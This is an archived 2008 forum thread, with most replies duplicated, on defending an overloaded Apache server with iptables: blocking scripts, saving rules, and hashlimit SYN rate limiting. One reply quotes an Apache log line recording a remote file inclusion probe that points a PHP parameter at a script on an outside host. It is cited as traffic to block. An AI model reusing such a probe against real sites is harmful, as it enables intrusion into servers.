Iptables to Manage web-Attacks [Linux Expert] - Linux

This is a discussion on Iptables to Manage web-Attacks [Linux Expert] - Linux ; Paris, le 16 Feb 2008, Dear all, Know how to manage iptables ? Point is we have a WS that is receiving tons of anormal IPs that are connecting at a rapid pace. We attempt to believe that our Histing ...

+ Reply to Thread
Results 1 to 16 of 16

Thread: Iptables to Manage web-Attacks [Linux Expert]

  1. Iptables to Manage web-Attacks [Linux Expert]


    Paris,
    le 16 Feb 2008,

    Dear all,

    Know how to manage iptables ?

    Point is we have a WS that is receiving tons of anormal IPs that are
    connecting at a rapid pace.

    We attempt to believe that our Histing House (Affi nity) are true
    profesionnals : much better than we are.

    We do not know why since 7 days someone destroys everything launching
    tons of connexions : The problem is Apache is getting over loaded with
    requests until the server runs out of memory and crashes.
    For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
    attacks.

    Hosting experts enabled syn-cookies, modified Apache timeouts and
    Server-Pool Size Regulation, and blocked ips in iptables.

    I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    line : "locate iptables" and editing files.

    Could not figure out where the IPs are listed and added to the
    definition list.

    Nothing in :
    /var/lock/subsys/iptables
    /etc/sysconfig/iptables-config
    /lib/iptables
    /etc/sysconfig/iptables
    /sbin/iptables

    Do you know the name of the file & location that includes the list of
    blocked IPs ?

    Many thanks and Regards for in advices.
    cougloff




  2. Re: Iptables to Manage web-Attacks [Linux Expert]

    On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme rearranged some electrons
    to say:

    > Paris,
    > le 16 Feb 2008,
    >
    > Dear all,
    >
    > Know how to manage iptables ?
    >
    > Point is we have a WS that is receiving tons of anormal IPs that are
    > connecting at a rapid pace.
    >
    > We attempt to believe that our Histing House (Affi nity) are true
    > profesionnals : much better than we are.
    >
    > We do not know why since 7 days someone destroys everything launching
    > tons of connexions : The problem is Apache is getting over loaded with
    > requests until the server runs out of memory and crashes. For sure our
    > USD 1.10 EBITDA / Day loss-of-time company worth these attacks.
    >
    > Hosting experts enabled syn-cookies, modified Apache timeouts and
    > Server-Pool Size Regulation, and blocked ips in iptables.
    >
    > I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line : "locate iptables" and editing files.
    >
    > Could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Nothing in :
    > /var/lock/subsys/iptables
    > /etc/sysconfig/iptables-config
    > /lib/iptables
    > /etc/sysconfig/iptables
    > /sbin/iptables
    >
    > Do you know the name of the file & location that includes the list of
    > blocked IPs ?
    >
    > Many thanks and Regards for in advices. cougloff


    You could use tcp wrappers:
    man tcpd

  3. Re: Iptables to Manage web-Attacks [Linux Expert]

    On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme rearranged some electrons
    to say:

    > Paris,
    > le 16 Feb 2008,
    >
    > Dear all,
    >
    > Know how to manage iptables ?
    >
    > Point is we have a WS that is receiving tons of anormal IPs that are
    > connecting at a rapid pace.
    >
    > We attempt to believe that our Histing House (Affi nity) are true
    > profesionnals : much better than we are.
    >
    > We do not know why since 7 days someone destroys everything launching
    > tons of connexions : The problem is Apache is getting over loaded with
    > requests until the server runs out of memory and crashes. For sure our
    > USD 1.10 EBITDA / Day loss-of-time company worth these attacks.
    >
    > Hosting experts enabled syn-cookies, modified Apache timeouts and
    > Server-Pool Size Regulation, and blocked ips in iptables.
    >
    > I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line : "locate iptables" and editing files.
    >
    > Could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Nothing in :
    > /var/lock/subsys/iptables
    > /etc/sysconfig/iptables-config
    > /lib/iptables
    > /etc/sysconfig/iptables
    > /sbin/iptables
    >
    > Do you know the name of the file & location that includes the list of
    > blocked IPs ?
    >
    > Many thanks and Regards for in advices. cougloff


    You could use tcp wrappers:
    man tcpd

  4. Re: Iptables to Manage web-Attacks [Linux Expert]

    On a sunny day (Sat, 16 Feb 2008 10:58:48 -0800 (PST)) it happened Pseudonyme
    wrote in
    :

    >I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    >line : "locate iptables" and editing files.
    >
    >Could not figure out where the IPs are listed and added to the
    >definition list.
    >
    >Nothing in :
    >/var/lock/subsys/iptables
    >/etc/sysconfig/iptables-config
    >/lib/iptables
    >/etc/sysconfig/iptables
    >/sbin/iptables
    >
    >Do you know the name of the file & location that includes the list of
    >blocked IPs ?
    >
    >Many thanks and Regards for in advices.
    >cougloff


    I use iptables for this, but of course in my own way ;-)

    I have a script, I run as root:
    ----------------------------------------------------
    # this is called to add a input deny for an IP addres to ipchains,
    # and save the configuration.

    if [ "$1" = "" ]
    then
    echo "Usage: reject IP_address"
    exit 1
    fi
    iptables -A INPUT -s $1 -p all -j DROP
    iptables -A OUTPUT -s $1 -p all -j REJECT

    iptables-save > /root/firewall


    exit 0
    --------------------------------------------------


    Fo example if I see in apache log something like this:
    83.137.193.66 www.stockguard.nl - - [15/Feb/2008:20:27:49 +0100] "GET /panteltje/fpga//cp2.php?securelib=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 887
    then, despite that the bad guy got a 404, I do:
    reject 83.137.193.66
    And he will never find my server again, or get any response from it, as the nameserver is also here.

    You will see from the above script that you can make your own list with:

    iptables-save > /path_to/yourtables


    There is also an iptables-restore, to initialize at power up:
    /sbin/iptables-restore < /path_to/yourtables

    You can flush with
    iptables -F

    or list all entries (takes a long time as it does nslookup) with
    iptables -L




  5. Re: Iptables to Manage web-Attacks [Linux Expert]

    On a sunny day (Sat, 16 Feb 2008 10:58:48 -0800 (PST)) it happened Pseudonyme
    wrote in
    :

    >I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    >line : "locate iptables" and editing files.
    >
    >Could not figure out where the IPs are listed and added to the
    >definition list.
    >
    >Nothing in :
    >/var/lock/subsys/iptables
    >/etc/sysconfig/iptables-config
    >/lib/iptables
    >/etc/sysconfig/iptables
    >/sbin/iptables
    >
    >Do you know the name of the file & location that includes the list of
    >blocked IPs ?
    >
    >Many thanks and Regards for in advices.
    >cougloff


    I use iptables for this, but of course in my own way ;-)

    I have a script, I run as root:
    ----------------------------------------------------
    # this is called to add a input deny for an IP addres to ipchains,
    # and save the configuration.

    if [ "$1" = "" ]
    then
    echo "Usage: reject IP_address"
    exit 1
    fi
    iptables -A INPUT -s $1 -p all -j DROP
    iptables -A OUTPUT -s $1 -p all -j REJECT

    iptables-save > /root/firewall


    exit 0
    --------------------------------------------------


    Fo example if I see in apache log something like this:
    83.137.193.66 www.stockguard.nl - - [15/Feb/2008:20:27:49 +0100] "GET /panteltje/fpga//cp2.php?securelib=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 887
    then, despite that the bad guy got a 404, I do:
    reject 83.137.193.66
    And he will never find my server again, or get any response from it, as the nameserver is also here.

    You will see from the above script that you can make your own list with:

    iptables-save > /path_to/yourtables


    There is also an iptables-restore, to initialize at power up:
    /sbin/iptables-restore < /path_to/yourtables

    You can flush with
    iptables -F

    or list all entries (takes a long time as it does nslookup) with
    iptables -L




  6. Re: Iptables to Manage web-Attacks [Linux Expert]

    Pseudonyme wrote:

    >
    > Paris,
    > le 16 Feb 2008,
    >
    > Dear all,
    >
    > Know how to manage iptables ?
    >
    > Point is we have a WS that is receiving tons of anormal IPs that are
    > connecting at a rapid pace.
    >
    > We attempt to believe that our Histing House (Affi nity) are true
    > profesionnals : much better than we are.
    >
    > We do not know why since 7 days someone destroys everything launching
    > tons of connexions : The problem is Apache is getting over loaded with
    > requests until the server runs out of memory and crashes.
    > For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
    > attacks.
    >
    > Hosting experts enabled syn-cookies, modified Apache timeouts and
    > Server-Pool Size Regulation, and blocked ips in iptables.
    >
    > I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line : "locate iptables" and editing files.
    >
    > Could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Nothing in :
    > /var/lock/subsys/iptables
    > /etc/sysconfig/iptables-config
    > /lib/iptables
    > /etc/sysconfig/iptables
    > /sbin/iptables
    >
    > Do you know the name of the file & location that includes the list of
    > blocked IPs ?
    >
    > Many thanks and Regards for in advices.
    > cougloff


    When you find it, why not post it? Make for good reading...


    --

    Jerry McBride (jmcbride@mail-on.us)

  7. Re: Iptables to Manage web-Attacks [Linux Expert]

    Pseudonyme wrote:

    >
    > Paris,
    > le 16 Feb 2008,
    >
    > Dear all,
    >
    > Know how to manage iptables ?
    >
    > Point is we have a WS that is receiving tons of anormal IPs that are
    > connecting at a rapid pace.
    >
    > We attempt to believe that our Histing House (Affi nity) are true
    > profesionnals : much better than we are.
    >
    > We do not know why since 7 days someone destroys everything launching
    > tons of connexions : The problem is Apache is getting over loaded with
    > requests until the server runs out of memory and crashes.
    > For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
    > attacks.
    >
    > Hosting experts enabled syn-cookies, modified Apache timeouts and
    > Server-Pool Size Regulation, and blocked ips in iptables.
    >
    > I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line : "locate iptables" and editing files.
    >
    > Could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Nothing in :
    > /var/lock/subsys/iptables
    > /etc/sysconfig/iptables-config
    > /lib/iptables
    > /etc/sysconfig/iptables
    > /sbin/iptables
    >
    > Do you know the name of the file & location that includes the list of
    > blocked IPs ?
    >
    > Many thanks and Regards for in advices.
    > cougloff


    When you find it, why not post it? Make for good reading...


    --

    Jerry McBride (jmcbride@mail-on.us)

  8. Re: Iptables to Manage web-Attacks [Linux Expert]

    Pseudonyme wrote:

    > Know how to manage iptables ?


    This depends on which "firewall" you are using to generate the iptables rules.


    > I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line : "locate iptables" and editing files.
    >
    > Could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Do you know the name of the file & location that includes the list of
    > blocked IPs ?


    Use iptables to add a new rule (see the manual page for iptables or visit
    www.iptables.org) and then use the iptables save feature to store the data for
    next restart.


    --

    //Aho

  9. Re: Iptables to Manage web-Attacks [Linux Expert]

    Pseudonyme wrote:

    > Know how to manage iptables ?


    This depends on which "firewall" you are using to generate the iptables rules.


    > I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line : "locate iptables" and editing files.
    >
    > Could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Do you know the name of the file & location that includes the list of
    > blocked IPs ?


    Use iptables to add a new rule (see the manual page for iptables or visit
    www.iptables.org) and then use the iptables save feature to store the data for
    next restart.


    --

    //Aho

  10. Re: Iptables to Manage web-Attacks [Linux Expert]

    On 16 Feb, 19:58, Pseudonyme wrote:
    > Paris,
    > le 16 Feb 2008,
    >
    > Dear all,
    >
    > Know how to manage iptables ?
    >
    > Point is we have a WS that is receiving tons of anormal IPs that are
    > connecting at a rapid pace.
    >
    > We attempt to believe that our Histing House (Affi nity) are true
    > profesionnals : much better than we are.
    >
    > We do not know why since 7 days someone destroys everything launching
    > tons of connexions : The problem is Apache is getting over loaded with
    > requests until the server runs out of memory and crashes.
    > For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
    > attacks.
    >
    > Hosting experts enabled syn-cookies, modified Apache timeouts and
    > Server-Pool Size Regulation, and blocked ips in iptables.
    >
    > I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line : "locate iptables" and editing files.
    >
    > Could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Nothing in :
    > /var/lock/subsys/iptables
    > /etc/sysconfig/iptables-config
    > /lib/iptables
    > /etc/sysconfig/iptables
    > /sbin/iptables
    >
    > Do you know the name of the file & location that includes the list of
    > blocked IPs ?
    >
    > Many thanks and Regards for in advices.
    > cougloff


    If you want, you can use the graphic tool system-config-firewall; it
    does a good job...

  11. Re: Iptables to Manage web-Attacks [Linux Expert]

    On 16 Feb, 19:58, Pseudonyme wrote:
    > Paris,
    > le 16 Feb 2008,
    >
    > Dear all,
    >
    > Know how to manage iptables ?
    >
    > Point is we have a WS that is receiving tons of anormal IPs that are
    > connecting at a rapid pace.
    >
    > We attempt to believe that our Histing House (Affi nity) are true
    > profesionnals : much better than we are.
    >
    > We do not know why since 7 days someone destroys everything launching
    > tons of connexions : The problem is Apache is getting over loaded with
    > requests until the server runs out of memory and crashes.
    > For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
    > attacks.
    >
    > Hosting experts enabled syn-cookies, modified Apache timeouts and
    > Server-Pool Size Regulation, and blocked ips in iptables.
    >
    > I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
    > line : "locate iptables" and editing files.
    >
    > Could not figure out where the IPs are listed and added to the
    > definition list.
    >
    > Nothing in :
    > /var/lock/subsys/iptables
    > /etc/sysconfig/iptables-config
    > /lib/iptables
    > /etc/sysconfig/iptables
    > /sbin/iptables
    >
    > Do you know the name of the file & location that includes the list of
    > blocked IPs ?
    >
    > Many thanks and Regards for in advices.
    > cougloff


    If you want, you can use the graphic tool system-config-firewall; it
    does a good job...

  12. Re: Iptables to Manage web-Attacks [Linux Expert]

    On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme wrote:

    > We do not know why since 7 days someone destroys everything launching
    > tons of connexions : The problem is Apache is getting over loaded with
    > requests until the server runs out of memory and crashes. For sure our
    > USD 1.10 EBITDA / Day loss-of-time company worth these attacks.


    Perhaps blocking more than N connections per time unit from any IP
    address? This could block quick legitimate accesses, but it might also
    block what appear to be DOS attacks.

    iptables can do this. See the "hashlimit" module.

    This will only work if there are many connections from a given IP. If
    the attack is sufficiently distributed, this will block too much
    legitimate traffic before helping with the attacks. But if you're trying
    to block individual IPs, then perhaps the attack is not terribly
    distributed.

    - Andrew

  13. Re: Iptables to Manage web-Attacks [Linux Expert]

    On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme wrote:

    > We do not know why since 7 days someone destroys everything launching
    > tons of connexions : The problem is Apache is getting over loaded with
    > requests until the server runs out of memory and crashes. For sure our
    > USD 1.10 EBITDA / Day loss-of-time company worth these attacks.


    Perhaps blocking more than N connections per time unit from any IP
    address? This could block quick legitimate accesses, but it might also
    block what appear to be DOS attacks.

    iptables can do this. See the "hashlimit" module.

    This will only work if there are many connections from a given IP. If
    the attack is sufficiently distributed, this will block too much
    legitimate traffic before helping with the attacks. But if you're trying
    to block individual IPs, then perhaps the attack is not terribly
    distributed.

    - Andrew

  14. Re: Iptables to Manage web-Attacks [Linux Expert]

    On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme wrote:
    >
    > We do not know why since 7 days someone destroys everything launching
    > tons of connexions : The problem is Apache is getting over loaded with
    > requests until the server runs out of memory and crashes. For sure our
    > USD 1.10 EBITDA / Day loss-of-time company worth these attacks.



    Have you thought of putting in a reverse cache server and putting in a
    redirect for the page(s) they are requesting.
    Then the cache will respond much faster while the existing server can take
    care of the redirected traffic which the "attacker" probably won't follow as
    its unlikely they are actually looking at the response or even waiting for
    it.
    You may even be able to do this on a hosted server so that the attacks never
    arrive at your physical site.
    You may have to change the redirects if the attacker decides to follow you
    about to your original server but its better than nothing and the host
    provider probably has experience of stopping these attacks using filters and
    they have the bandwidth to do it which you probably don't.



  15. Re: Iptables to Manage web-Attacks [Linux Expert]

    On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme wrote:
    >
    > We do not know why since 7 days someone destroys everything launching
    > tons of connexions : The problem is Apache is getting over loaded with
    > requests until the server runs out of memory and crashes. For sure our
    > USD 1.10 EBITDA / Day loss-of-time company worth these attacks.



    Have you thought of putting in a reverse cache server and putting in a
    redirect for the page(s) they are requesting.
    Then the cache will respond much faster while the existing server can take
    care of the redirected traffic which the "attacker" probably won't follow as
    its unlikely they are actually looking at the response or even waiting for
    it.
    You may even be able to do this on a hosted server so that the attacks never
    arrive at your physical site.
    You may have to change the redirects if the attacker decides to follow you
    about to your original server but its better than nothing and the host
    provider probably has experience of stopping these attacks using filters and
    they have the bandwidth to do it which you probably don't.



  16. Re: Iptables to Manage web-Attacks [Linux Expert]

    Hi, i think this is what you want:

    this rule is for SYN packets but you cand modify it to fit your needs

    iptables -t mangle -I PREROUTING -p tcp --syn --match hashlimit --hashlimit-name sins --hashlimit 50/s --hashlimit-mode srcip --hashlimit-htable-max 524288 -j ACCEPT
    iptables -t mangle -A PREROUTING -p tcp --syn -j DROP

+ Reply to Thread